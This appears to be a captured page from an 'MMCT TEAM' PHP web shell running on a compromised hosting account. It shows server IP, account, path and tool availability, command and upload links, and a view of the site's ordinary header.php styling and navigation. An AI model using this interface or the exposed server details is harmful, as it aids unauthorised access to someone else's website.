MMCT TEAM
Server IP : 162.214.80.37  /  Your IP : 216.73.216.83
Web Server : Apache
System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : imyrqtmy ( 2189)
PHP Version : 8.2.18
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/imyrqtmy/public_html/sunriseventures/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/imyrqtmy/public_html/sunriseventures/header.php
<style>
.bg-image {
  /* The image used */
  background-image: url("assets/images/bg/75478.jpg");

     filter: blur(10px);
  background-size: cover;
  
    position: absolute; 
            height: 100%; 
            width: 100%; 
            background-image: url( "assets/images/bg/75478.jpg"); 
            background-size: cover; 
            background-position: center; 
            filter: blur(10px); 
            z-index: -1; 
}

.mrl{
        margin-left: 0px!important;
}

.lgs{
    height: 110px;
    padding: 5px;
}

.mrt{
    margin-top:55px;
}
    
</style>
<style type="text/css">
     .icon-bar {
    position: fixed;
    top: 50%;
    left: 1%;
    -webkit-transform: translateY(-50%);
    -ms-transform: translateY(-50%);
    transform: translateY(-50%);
    z-index: 1024;
}
.icon-bar a {
    display: block;
    text-align: center;
    padding: 10px;
    transition: all 0.3s ease;
    color: white;
    font-size: 20px;
}
.twitter {
    background: green;
    color: white;
}
.facebook {
    background: #54be73;
    color: white;
}
.google {
    background: #005c97;
    color: white;
}
.trin-trin
{
    animation-name: trin;
    animation-duration: 1.5s;
    animation-iteration-count: infinite;
    animation-timing-function: linear;
}

@keyframes trin {

    from {
        transform:rotate3d(0, 0, 1, 0deg);
    }
    20%, 32%, 44%, 56%, 68% {
        transform: rotate3d(0, 0, 1, 0deg);
    }
    23%, 35%, 47%, 59%, 71% {
        transform: rotate3d(0,0,1,15deg);
    }
    26%, 38%, 50%, 62%, 74% {
        transform: rotate3d(0,0,1,0deg);
    }
    29%, 41%, 53%, 65%, 77% {
        transform: rotate3d(0,0,1,-15deg);
    }
    80% {
        transform:rotate3d(0, 0, 1, 0deg);
    }

}

.trin-trinw
{
    animation: wiggle 1.5s linear infinite;
}

@keyframes wiggle {
  0%, 7% {
    transform: rotateZ(0);
  }
  15% {
    transform: rotateZ(-15deg);
  }
  20% {
    transform: rotateZ(10deg);
  }
  25% {
    transform: rotateZ(-10deg);
  }
  30% {
    transform: rotateZ(6deg);
  }
  35% {
    transform: rotateZ(-4deg);
  }
  40%, 100% {
    transform: rotateZ(0);
  }
}

</style>

<style>
    
 .btn-sonar {
    background: #d31f26;
    border: 0;
    border-radius: 50%;
    width: 60px;
    height: 60px;
    display: inline-block;
    color: #fff;
    outline: 0;
    position: fixed;
    text-align: center;
    line-height: 80px;
    left: 10px;
    bottom: 50px;
    z-index: 99;
}
.btn-sonar img {
    width: 35px;
    height: 35px;
    margin-top: -20px;
    animation: rotate-img 1s infinite;
}

.btn-sonar::before {
    content: "";
    display: inline-block;
    position: absolute;
    width: 100%;
    height: 100%;
    border-radius: 50%;
    top: 0;
    left: 0;
    animation: sonar-effect 1s ease-in-out .1s infinite;
}



@keyframes rotate-in {
  0% {
    -webkit-transform: perspective(120px) rotateX(0deg) rotateY(0deg);
    transform: perspective(120px) rotateX(0deg) rotateY(0deg);
  }
  50% {
    -webkit-transform: perspective(120px) rotateX(-180.1deg) rotateY(0deg);
    transform: perspective(120px) rotateX(-180.1deg) rotateY(0deg);
  }
  100% {
    -webkit-transform: perspective(120px) rotateX(-180deg) rotateY(-179.9deg);
    transform: perspective(120px) rotateX(-180deg) rotateY(-179.9deg);
  }
}


@keyframes sonar-effect{0%{opacity:.3}40%{opacity:.5;box-shadow:0 0 0 5px #d31f26,0 0 10px 10px #d31f26,0 0 0 10px #d31f26}100%{box-shadow:0 0 0 5px #d31f26,0 0 10px 10px #d31f26,0 0 0 10px #1fd3ba;transform:scale(1.5);opacity:0}}

  @media (max-width: 767.98px){
    .section-top-spacing {
        padding-top: 80px;
    }
  }
    .contact-whatsapp {
    width: 50px;
    position: fixed;
    bottom: 80px;
    right: 10px;
    z-index: 9999;
    display: inline-block;
    /*animation: up-down 1s infinite;*/
}

@keyframes up-down {
    0% {transform:translateY(0px);}
    50% {transform:translateY(20px);}
    100% {transform:translateY(0px);}
    50% {margin-top:-20px;}
    100% {margin-top: 0px;}

}
 </style>
  <header class="main_header">
        <div class="container-fluid position-relative">
            <div class="header_fixed">
                <a class="navbar-brand" href="index.php">
                    <img class="logo lgs img-fluid" src="assets/images/logo.jpeg" alt="logo">
                </a>

                <div class="main_menu">
                    <div class="stellarnav">
                        <ul>
                            <li><a href="index.php">Home</a></li>
                            <li><a href="#">About Us</a></li>
                           
                        </ul>
                    </div>
                    <div class="contactBtn_top">
                    </div>
                </div>
            </div>
        </div>
    </header>

MMCT - 2023